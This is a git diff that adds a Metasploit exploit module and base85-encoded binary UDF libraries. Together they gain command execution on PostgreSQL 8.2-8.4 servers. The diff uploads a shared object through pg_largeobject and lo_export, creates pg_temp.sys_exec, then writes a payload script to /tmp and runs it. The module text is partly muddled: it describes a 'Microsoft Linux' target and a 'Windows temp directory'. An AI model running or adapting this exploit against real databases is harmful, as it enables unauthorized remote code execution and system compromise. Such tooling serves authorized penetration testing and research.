z>ZFl8R7jeRBXqjV$L6M4wSGg*(5a8HF~t_C$=<SSrc9l7ZTWS+%Bt#`nJOkqAWgNs
z(7`qyhd?9HjZ%S<Gb(TT9Y8vScc6)tz+J!xfqQ{}0PY8F16shp0gnKW0Xwl;!_mM2
z;1pm9vUM)dhwXh2un3#~WgxXnl(XVym9wlkXVj3vh4jsY<n-=Vjd-+VLL{F;<t*|#
z$S0gdPGcH=7CDV4-yx?qA4EBZwbJhrm9Ao+tJLRmC-b}V*5;D_k0_1s3j!7NsoYtv
z(zSWB$%gcAp*#WoWYYVze=@HNMsB69g6J5^3()I#A^2CiN-JG%pKDTA!P@*(-hH{%
zuF2J|`XpVZQ&8xg@j1-nYp7Fuu)i<w{@fauyV5nu=bG$ul~=nel7qVjtu07lKM_qp
zSpdHqG4J&x$ogR%XeU|FmA^KRx~;oNYAlB)suMZ+tTdZ5RHtWSB06A+<hz7Cqse;|
zcSqgI_Me`~M9F>~oqQm9=G{Sq1u>{X<RXzgJ0{qla*>F>$q=!bs=vssc@C?JxiVZ!
zv)^v0D$h=n_+gc<DWZ*>WRh#kvSR(sjH=Qe(pUGthYc}Ln&<ARBh25x`p=k`esS3U
zJIHrPXG3A0z@>~`j1MtB&iFiIKjYhs|71MQIEWKq1moq5(->zm&SMNSE@kXue2DRJ
z#^)L3y-MDr)U2wi>)n&8LyMXNZSE<aYdmFFdp+JOvQ@?ESwCzbNttJg%@o|#)2{g6
znw+yAo_GZB(uu$#d=+f#@I(Ufi1IWpZ;LN)%_3f;wPtB37H^KWeU0%$7Ynrn$boC^
zEeYk(-x56Z;;lUTi-IQ>)vw2%P{bdO1zJP?NF#iOQ=VWV8jGXBEG!N}iI{=b<{%o3
zA`E^!I(9Y=-m>8oZEX#;C7h}AU-3ooqCGD8FXw>Z4ZLw=AItuebA!_CIQEeE%ef)g
z!o70(vsk}dQ4H~yb49S19jQICk@jW3)AwpJ5q~+S1m#?Ui6%J*grA5Coe|<M=YpU<
zn_(mU7dyc+=;+K5Ud|msH}pi*e`;I$PckAOij0l;jcgz&=bW@J{xbd>9sY7|3d%W4
z{&ZG5{Tm>oe#yBm_k^Id0~1ZM?!wdj*!}DI+!1UirH#bDm}T>Uc7OSQlHf9NV0-bC
zkO7Ck+-rjNZx7_-2&bCZU)HalKPCuPlaq~{?bGE#{TKgp{l7>;INQfV?brNIa{Gex
zEM_NJKatU^1(`^Gbe6caO8#Hw?61@RK8Jq~`}goilJD~Wg~NY6`>$tzXM0ZmVfa(-
zN&n?ul>ghw|L0`h#9#XLsH6RIe$FW8k2cQy6@S4E4u5%0sb~Kk(A!D;1fPM@KL2tb
zmh#6T>8HdHKjB|Mg=8{*`EEan{hjtQ590qaDvlJ<D)E0p3>lra_P*OqU+4C>+l8n*
G{r?SX<~j2K

literal 0
HcmV?d00001

diff --git a/data/exploits/postgres/8.4/32/lib_postgresqludf_sys.so b/data/exploits/postgres/8.4/32/lib_postgresqludf_sys.so
new file mode 100755
index 0000000000000000000000000000000000000000..9e07a823ff4a214207fe18001adfa3f663a67c26
GIT binary patch
literal 5132
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

literal 0
HcmV?d00001

diff --git a/data/exploits/postgres/8.4/64/lib_postgresqludf_sys.so b/data/exploits/postgres/8.4/64/lib_postgresqludf_sys.so
new file mode 100755
index 0000000000000000000000000000000000000000..80eec1a745ae896eccdd0270b6eb586da4adc8f9
GIT binary patch
literal 7712
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
LzsoK}-Rb{tz4AD!

literal 0
HcmV?d00001

diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb
index fa0b32f3fd..94081c47b0 100644
--- a/lib/msf/core/exploit/postgres.rb
+++ b/lib/msf/core/exploit/postgres.rb
@@ -1,4 +1,3 @@
-# -*- coding: binary -*-
 require 'msf/core'
 
 module Msf
@@ -12,6 +11,7 @@ module Msf
 module Exploit::Remote::Postgres
 
 	require 'postgres_msf'
+	require 'base64'
 	include Msf::Db::PostgresPR
 	attr_accessor :postgres_conn
 
@@ -264,7 +264,7 @@ module Exploit::Remote::Postgres
 		read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
 			COPY #{temp_table_name} FROM '#{filename}';
 			SELECT * FROM #{temp_table_name}}
-		read_return = postgres_query(read_query)
+		read_return = postgres_query(read_query,true)
 	end
 
 	def postgres_has_database_privilege(priv)
@@ -288,21 +288,35 @@ module Exploit::Remote::Postgres
 		return true
 	end
 
+        # Creates the function sys_exec() in the pg_temp schema.
+        def postgres_create_sys_exec_linux(so)
+                q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{so}', 'sys_exec' language C returns null on null input immutable"
+                resp = postgres_query(q);
+                if resp[:sql_error]
+                        print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}"
+                        return false
+                end
+                return true
+        end
+
+
 	# This presumes the pg_temp.sys_exec() udf has been installed, almost
 	# certainly by postgres_create_sys_exec()
 	def postgres_sys_exec(cmd)
+		print_status "Attempting to Execute: #{cmd}"
 		q = "select pg_temp.sys_exec('#{cmd}')"
 		resp = postgres_query(q)
 		if resp[:sql_error]
-			print_error resp[:sql_error]
+			print_error "SQL Bomb #{resp[:sql_error]}"
 			return false
 		end
 		return true
 	end
 
+
 	# Takes a local filename and uploads it into a table as a Base64 encoded string.
 	# Returns an array if successful, false if not.
-	def postgres_upload_binary_file(fname)
+	def postgres_upload_binary_file_linux(fname)
 		data = postgres_base64_file(fname)
 		tbl,fld = postgres_create_stager_table
 		return false unless data && tbl && fld
@@ -312,11 +326,87 @@ module Exploit::Remote::Postgres
 			print_error resp[:sql_error]
 			return false
 		end
-		oid, fout = postgres_write_data_to_disk(tbl,fld)
+		oid, fout = postgres_write_data_to_disk_linux(tbl,fld)
 		return false unless oid && fout
 		return [tbl,fld,fout,oid]
 	end
 
+        # Takes a local filename and uploads it into a table as a Base64 encoded string.
+        # Returns an array if successful, false if not.
+        def postgres_upload_binary_file(fname)
+                data = postgres_base64_file(fname)
+                tbl,fld = postgres_create_stager_table
+                return false unless data && tbl && fld
+                q = "insert into #{tbl}(#{fld}) values('#{data}')"
+                resp = postgres_query(q)
+                if resp[:sql_error]
+                        print_error resp[:sql_error]
+                        return false
+                end
+                oid, fout = postgres_write_data_to_disk(tbl,fld)
+                return false unless oid && fout
+                return [tbl,fld,fout,oid]
+        end
+
+        def postgres_upload_binary_file_elf(fname)
+                data = Base64.encode64(fname)
+                tbl,fld = postgres_create_stager_table
+                return false unless data && tbl && fld
+                q = "insert into #{tbl}(#{fld}) values('#{data}')"
+                resp = postgres_query(q)
+                if resp[:sql_error]
+                        print_error resp[:sql_error]
+                        return false
+                end
+                oid, fout = postgres_write_data_to_disk_elf(tbl,fld)
+                return false unless oid && fout
+                return [tbl,fld,fout,oid]
+        end
+
+
+
+        # Writes b64 data from a table field, decoded, to disk.
+        def postgres_write_data_to_disk_elf(tbl,fld)
+                oid = rand(60000) + 1000
+                fname = "/tmp/" + Rex::Text::rand_text_alpha(8)
+                queries = [
+                        "select lo_create(#{oid})",
+                        "update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
+                        "select lo_export(#{oid}, '#{fname}')"
+                ]
+                queries.each do |q|
+                        resp = postgres_query(q)
+                        if resp && resp[:sql_error]
+                                print_error "Could not write the library to disk."
+                                print_error resp[:sql_error]
+                                break
+                        end
+                end
+                return oid,fname
+        end
+
+
+        # Writes b64 data from a table field, decoded, to disk.
+        def postgres_write_data_to_disk_linux(tbl,fld)
+                oid = rand(60000) + 1000
+                fname = "/tmp/" + Rex::Text::rand_text_alpha(8) + ".so"
+                queries = [
+                        "select lo_create(#{oid})",
+                        "update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
+                        "select lo_export(#{oid}, '#{fname}')"
+                ]
+                queries.each do |q|
+                        resp = postgres_query(q)
+                        if resp && resp[:sql_error]
+                                print_error "Could not write the library to disk."
+                                print_error resp[:sql_error]
+                                break
+                        end
+                end
+                return oid,fname
+        end
+
+
 	# Writes b64 data from a table field, decoded, to disk.
 	def postgres_write_data_to_disk(tbl,fld)
 		oid = rand(60000) + 1000
@@ -343,6 +433,12 @@ module Exploit::Remote::Postgres
 		[data].pack("m*").gsub(/\r?\n/,"")
 	end
 
+        def postgres_base64_elf(data)
+                #data = File.open(fname, "rb") {|f| f.read f.stat.size}
+                [data].pack("m*").gsub(/\r?\n/,"")
+        end
+
+
 	# Creates a temporary table to store base64'ed binary data in.
 	def postgres_create_stager_table
 		tbl = Rex::Text.rand_text_alpha(8).downcase
diff --git a/modules/exploits/linux/postgres/postgres_payload.rb b/modules/exploits/linux/postgres/postgres_payload.rb
new file mode 100644
index 0000000000..14f38cd20f
--- /dev/null
+++ b/modules/exploits/linux/postgres/postgres_payload.rb
@@ -0,0 +1,170 @@
+###
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::Postgres
+
+	# Creates an instance of this module.
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'PostgreSQL for Microsoft Linux Payload Execution',
+			'Description'    => %q{
+				This module creates and enables a custom UDF (user defined function) on the
+				target host via the UPDATE pg_largeobject method of binary injection. On
+				default Microsoft Linux installations of PostgreSQL (=< 8.4), the postgres
+				service account may write to the Windows temp directory, and may source
+				UDF Shared Libraries's from there as well.
+
+				PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on are valid targets for this module.
+
+				NOTE: This module will leave a payload executable on the target system when the
+				attack is finished, as well as the UDF SO and the OID.
+			},
+			'Author'         =>
+			[
+				'todb' # this Metasploit module
+			],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'URL', 'http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf',
+						'URL', 'http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql' # A litte more specific to PostgreSQL
+					]
+				],
+			'Platform'       => 'unix',
+			'Arch'		=> ARCH_CMD,
+			'Payload'        =>
+				{
+					'Space'    => 0x65535,
+					'DisableNops'  => true,
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'perl',
+						}
+				},
+			'Targets'        =>
+			[
+				[ 'Automatic', { } ], # Confirmed on XXX
+			],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Apr 10 2009' # Date of Bernardo's BH Europe paper.
+
+			))
+
+                        register_options(
+                               [
+                                       OptString.new('BITS',[true,'32/ 64 bit OS',32])
+                               ],self.class)
+
+
+		deregister_options('SQL', 'RETURN_ROWSET')
+	end
+
+	# Buncha stuff to make typing easier.
+	def username; datastore['USERNAME']; end
+	def password; datastore['PASSWORD']; end
+	def database; datastore['DATABASE']; end
+	def verbose; datastore['VERBOSE']; end
+	def rhost; datastore['RHOST']; end
+	def rport; datastore['RPORT']; end
+	def bits; datastore['BITS'];end
+
+	def execute_command(cmd, opts)
+		postgres_sys_exec(cmd)
+	end
+
+	def exploit
+		version = get_version(username,password,database,verbose)
+		case version
+		when :nocompat; print_error "Authentication successful, but not a compatable version."
+		when :noauth; print_error "Authentication failed."
+		when :noconn; print_error "Connection failed."
+		end
+		return unless version =~ /8\.[234]/
+		print_status "Authentication successful and vulnerable version #{version} on Linux confirmed."
+		tbl,fld,so,oid = postgres_upload_binary_file_linux(so_fname(version))
+		unless tbl && fld && so && oid
+			print_error "Could not upload the UDF SO"
+			return
+		end
+
+		print_status "Uploaded #{so} as OID #{oid} to table #{tbl}(#{fld})"
+		ret_sys_exec = postgres_create_sys_exec_linux(so)
+		if ret_sys_exec
+			if @postgres_conn
+				print_status "Success"
+								
+				tbl,fld,myexploit,oid = postgres_upload_binary_file_elf("#!/bin/sh\n" + payload.encode)
+		                unless tbl && fld && myexploit && oid
+                		        print_error "Could not upload the PAYLOAD"
+                        		return
+                		end
+				print_status "Uploaded #{myexploit} as OID #{oid} to table #{tbl}(#{fld})"
+				postgres_sys_exec("chmod 755 #{myexploit}")
+				postgres_sys_exec("#{myexploit}")
+                		handler
+				postgres_logout if @postgres_conn
+			else
+				print_error "Lost connection."
+				return
+			end
+		end
+		postgres_logout if @postgres_conn
+
+	end
+
+	def so_fname(version)
+		print_status "Using #{version}/#{bits}/lib_postgresqludf_sys.so"
+		File.join(Msf::Config.install_root,"data","exploits","postgres",version,bits,"lib_postgresqludf_sys.so")
+	end
+
+	# A shorter version of do_fingerprint from the postgres_version scanner
+	# module, specifically looking for versions that valid targets for this
+	# module.
+	def get_version(user=nil,pass=nil,database=nil,verbose=false)
+		begin
+			msg = "#{rhost}:#{rport} Postgres -"
+			password = pass || postgres_password
+			vprint_status("Trying username:'#{user}' with password:'#{password}' against #{rhost}:#{rport} on database '#{database}'")
+			result = postgres_fingerprint(
+				:db => database,
+				:username => user,
+				:password => password
+			)
+			if result[:auth]
+				# So, the only versions we have DLL binaries for are PostgreSQL 8.2, 8.3, and 8.4
+				# This also checks to see if it was compiled with a windows-based compiler --
+				# the stock Postgresql downloads are Visual C++ for 8.4 and 8.3, and GCC for mingw)
+				# Also, the method to write files to disk doesn't appear to work on 9.0, so
+				# tabling that version for now.
+				#if result[:auth] =~ /PostgreSQL (8\.[234]).*(Visual C\+\+|mingw|cygwin)/i
+				if result[:auth] =~ /PostgreSQL (8\.[234]).*/i
+					return $1
+				else
+					print_status "Found #{result[:auth]}"
+					return :nocompat
+				end
+			else
+				return :noauth
+			end
+		rescue Rex::ConnectionError
+			vprint_error "#{rhost}:#{rport} Connection Error: #{$!}"
+			return :noconn
+		end
+	end
+
+end